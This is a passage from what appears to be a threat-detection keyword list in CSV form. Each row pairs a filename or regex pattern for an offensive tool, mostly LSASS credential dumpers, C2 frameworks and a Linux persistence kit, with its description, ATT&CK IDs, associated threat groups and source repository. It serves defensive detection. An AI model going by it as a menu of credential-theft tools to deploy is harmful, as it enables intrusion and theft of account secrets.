SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","6816" "*/DueDLLigence.git*",".{0,1000}\/DueDLLigence\.git.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","6817" "*/dukes_apt29.profile*",".{0,1000}\/dukes_apt29\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","6818" "*/dummy.pac2.localhost*",".{0,1000}\/dummy\.pac2\.localhost.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","6819" 
"*/dump.ps1*",".{0,1000}\/dump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6820" "*/dump_lsass.*",".{0,1000}\/dump_lsass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","6821" "*/DumpAADSyncCreds.git*",".{0,1000}\/DumpAADSyncCreds\.git.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","6822" "*/DumpCerts*",".{0,1000}\/DumpCerts.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","6823" "*/DumpCreds*",".{0,1000}\/DumpCreds.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 
script argument","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","6824" "*/dumpCredStore.ps1*",".{0,1000}\/dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6825" "*/dumper.ps1*",".{0,1000}\/dumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","6826" "*/dumper2020.git*",".{0,1000}\/dumper2020\.git.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","1","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","6827" "*/dumper2020_exe*",".{0,1000}\/dumper2020_exe.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","1","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","6828" "*/dumpert.c*",".{0,1000}\/dumpert\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","6829" "*/dumpert.py*",".{0,1000}\/dumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","6830" "*/Dumpert/*",".{0,1000}\/Dumpert\/.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","6831" "*/DumpIt.exe*",".{0,1000}\/DumpIt\.exe.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","6832" "*/DumpLSASS.git*",".{0,1000}\/DumpLSASS\.git.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","1","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","6833" "*/Dump-Lsass.git*",".{0,1000}\/Dump\-Lsass\.git.{0,1000}","offensive_tool_keyword","impacket","Dump-lsass script using impacket - Automates the manual process of using wmiexec and procdump to dump Lsass and plaintext creds or hashes across a large number of systems.","T1021 - T1047 - T1055.011 - T1003","TA0002 - TA0005 - TA0006","N/A","Dispossessor - Black Basta","Credential Access","https://github.com/kaluche/Dump-Lsass","1","1","N/A","N/A","10","1","1","0","2019-11-14T18:15:26Z","2019-11-20T20:26:27Z","6834" 
"*/DumpLsass.ps1*",".{0,1000}\/DumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","6835" "*/dump-lsass.py*",".{0,1000}\/dump\-lsass\.py.{0,1000}","offensive_tool_keyword","impacket","Dump-lsass script using impacket - Automates the manual process of using wmiexec and procdump to dump Lsass and plaintext creds or hashes across a large number of systems.","T1021 - T1047 - T1055.011 - T1003","TA0002 - TA0005 - TA0006","N/A","Dispossessor - Black Basta","Credential Access","https://github.com/kaluche/Dump-Lsass","1","1","N/A","N/A","10","1","1","0","2019-11-14T18:15:26Z","2019-11-20T20:26:27Z","6836" "*/dumpmethod/*.py",".{0,1000}\/dumpmethod\/.{0,1000}\.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","6837" "*/DumpNParse.exe*",".{0,1000}\/DumpNParse\.exe.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","1","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","6838" 
"*/DumpNParse.git*",".{0,1000}\/DumpNParse\.git.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","1","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","6839" "*/DumpNTLMInfo.py*",".{0,1000}\/DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6840" "*/dumpSecrets.go*",".{0,1000}\/dumpSecrets\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","6842" "*/dumpsecrets_test.go*",".{0,1000}\/dumpsecrets_test\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential 
Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","6843" "*/DumpShellcode/*",".{0,1000}\/DumpShellcode\/.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","6844" "*/DumpsterFire/*",".{0,1000}\/DumpsterFire\/.{0,1000}","offensive_tool_keyword","DumpsterFire","The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.","T1175 - T1176 - T1589","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TryCatchHCF/DumpsterFire","1","0","N/A","N/A","N/A","10","1010","147","2020-05-27T15:00:56Z","2017-10-05T23:44:54Z","6845" "*/DumpSvc.exe*",".{0,1000}\/DumpSvc\.exe.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","6846" "*/DumpThatLSASS.*",".{0,1000}\/DumpThatLSASS\..{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","6847" "*/DumpThatLSASS.git*",".{0,1000}\/DumpThatLSASS\.git.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","6848" "*/DumpThatLSASS/*",".{0,1000}\/DumpThatLSASS\/.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","6849" "*/dumpweb.log*",".{0,1000}\/dumpweb\.log.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","#logfile #linux","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","6850" 
"*/dumpXor.exe*",".{0,1000}\/dumpXor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","6851" "*/dumpXor/dumpXor*",".{0,1000}\/dumpXor\/dumpXor.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","6852" "*/dumpy.exe*",".{0,1000}\/dumpy\.exe.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","1","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","6853" "*/Dumpy.git*",".{0,1000}\/Dumpy\.git.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","1","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","6854" 
"*/dunderhay/CVE-202*",".{0,1000}\/dunderhay\/CVE\-202.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/dunderhay/CVE-2020-5902","1","1","N/A","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z","6855" "*/duplicates.nse*",".{0,1000}\/duplicates\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6856" "*/DynastyPersist.git*",".{0,1000}\/DynastyPersist\.git.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","6864" 